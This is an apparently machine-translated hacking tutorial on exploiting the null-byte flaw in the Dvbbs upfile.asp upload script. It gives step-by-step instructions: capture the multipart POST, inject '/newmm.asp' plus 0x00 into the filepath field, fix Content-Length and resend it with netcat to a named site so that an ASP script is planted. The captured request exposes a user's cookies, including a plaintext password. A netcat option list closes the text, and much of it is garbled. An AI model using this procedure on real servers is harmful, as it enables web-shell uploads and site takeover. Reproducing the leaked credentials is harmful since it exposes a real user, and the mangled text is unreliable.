PHP/ASP Upload vulnerability

PHP/ASP Upload vulnerability 1: The transfer vulnerability only uses asp and php scripts uploaded in form format *** <br/> nc (netcat) <br/> & nbsp; & nb 1: The transfer vulnerability is used only for asp and php scripts uploaded in form format ***
Nc (netcat)
Used to submit data packets
Run the following command on the dos interface:
Nc-vv www. ****. com 80 <1.txt
-Vv: Echo
80: www Port
1. txt: the data packet you want to send
(For more usage, refer to the post in this area)
Wse (wsockexpert)
Monitors local ports and captures packets submitted by ie

2: vulnerability principle
Assumptions in the following example
Www host: www. ****. com;
Bbs path:/bbs/
The vulnerability is due to the study of file uploading through the Internet. it is recommended that you have some programming experience.
Check the upfile. asp file of dvbbs. you do not need to understand it all.
Upfile is uploaded by generating a form table, as shown below:

Variables used:
Filepath default value: uploadface attribute hiden
Act default value upload attribute hiden
File1 is the file you want to upload.
The key is the filepath variable!
By default, our files are uploaded to www. ***. com/bbs/uploadface/
The file is named after your upload time, which is the sentence in upfile.
Filename = formpath & year (now) & month (now) & day (now) & hour (now) & minute (now) & second (now) & rannum &". "& fileext
--------------------------------------
We know that the data in the computer is "1". anyone who uses C language knows this.
Char data [] = "bbs"
The data array length is 4: B s.
What if we construct the filepath as follows?
Filepath = "/newmm. asp"
The file we uploaded in, and will change.
When no change is made:
_ Blank> http: // www. ****. com/bbs/uploadface/20040924020..jpg
When we construct a filepath:
_ Blank> http: // www. ****. com/newmm. asp/20040924020..jpg
In this way, when the server receives filepath data,
It is understood that the data in filepath is over.
In this way, the files we upload, such as c:. asp
Save it as: _ blank> http: // www. ***. com/newmm. asp
3: Supplement later
After the vulnerability is published, many websites have processed the vulnerability, but none of them can filter and process the filepath.
There are many sites, but only the changes with the nhidenode are added to the upfile.exe on the Internet.
Upload vulnerability exploitation tool or filepath variable exploitation tool (Veteran's)... but the most basic is not changed ..
There are similar vulnerabilities in website plug-ins. what I want to say is not to rely on specialized tools.
Change the filepath variable in the bag caught by wse, and submit it in nc...
Even if he adds n hiden variables, it does not help.
Of course, if we strictly filter filepath, our theory will end.
This is when our new theory was born!

4: detailed instance:
---------------------
One pair of wse (( saved to 1.txt ):
Post, bbs, upphoto, and upfile. asp http/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword ,*/*
Referer: _ blank> http://www.xin126.com/bbs/upphoto/upload.asp
Accept-language: zh-cn
Content-type: multipart/form-data; boundary = ----------- 7d423a138d0278
Accept-encoding: gzip, deflate
User-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1;. net clr 1.1.4322)
Host: _ blank> www.xin126.com
Content-length: 1969
Connection: keep-alive
Cache-control: no-cache
Cookie: aspsessionidaccccdcs = Beijing; iscome = 1; gamvancookies = 1; regtime = 2004% 2d9% 2d24 + 3% 3a39% 3a37; username = szjwwwww; pass = 5211314; dl = 0; userid = 62; ltstyle = 0; logintry = 1; userpass = eb03f6c72908fd84

----------------------------- 7d423a138d0278
Content-disposition: form-data; name = "filepath"

../Medias/myphoto/
----------------------------- 7d423a138d0278
......

Upload
--------------- 7d423a138d0278 -----------------
、Ultraeditopen 1.txt to change data:
......
----------------------------- 7d423a138d0278
Content-disposition: form-data; name = "filepath"
/Newmm. asp? <= The black color indicates that a space is 0x20. change it to 0x00.
......
----------------------------
3. recalculate the cookie length and submit the cookie by nc.

Nc-vv _ blank> www.xin126.com 80 <1.txt

Ultraedit is a 16-bit editor that can be downloaded from the Internet.
We mainly used to write the ending Peugeot: ===> 16 bits: 0x00 or 00 h
In fact, when you change it, you just need to add a 00 at the end of filepath.

Calculate the cookie length ==> after you change fillepath, it must be or + or-the cookie length has changed
......
Host: _ blank> www.xin126.com
Content-length: 1969 <======
Connection: keep-alive
Cache-control: no-cache
......
Computing? A letter or number is 1

Solutions for upload vulnerabilities: (for reference only)

1. Generally, the upload path is processed as a variable.
==> Our countermeasure is to convert filepath into a constant...
This method is currently the most effective (I think)

2. strengthen the processing. it turns out that we have finished reading this article.
We continue to read the start point of the next variable, and the processing will be OK.

Appendix: NC Usage:
Monitor external hosts
Nc [-options] hostname port [s] [ports]...
Listen to local hosts
Nc-l-p port [options] [hostname] [port]
Options:
-D detach from console, stealth mode
-E prog inbound program to exec [dangerous!]
-G gateway source-routing hop point [s], up to 8
-G num source-routing pointer: 4, 8, 12 ,...
-H this cruft
-I secs delay interval for lines sent, ports scanned
-L listen mode, for inbound connects
-L listen harder, re-listen on socket close
-N numeric-only ip addresses, no dns
-O file hex dump of traffic
-P port local port number
-R randomize local and remote ports
-S addr local source address
-T answer telnet negotiation
-U udp mode
-V verbose [use twice to be more verbose]
-W secs timeout for connects and final net reads
-Z zero-I/o mode [used for scanning]
Port numbers can be individual or ranges: m-n [random sive]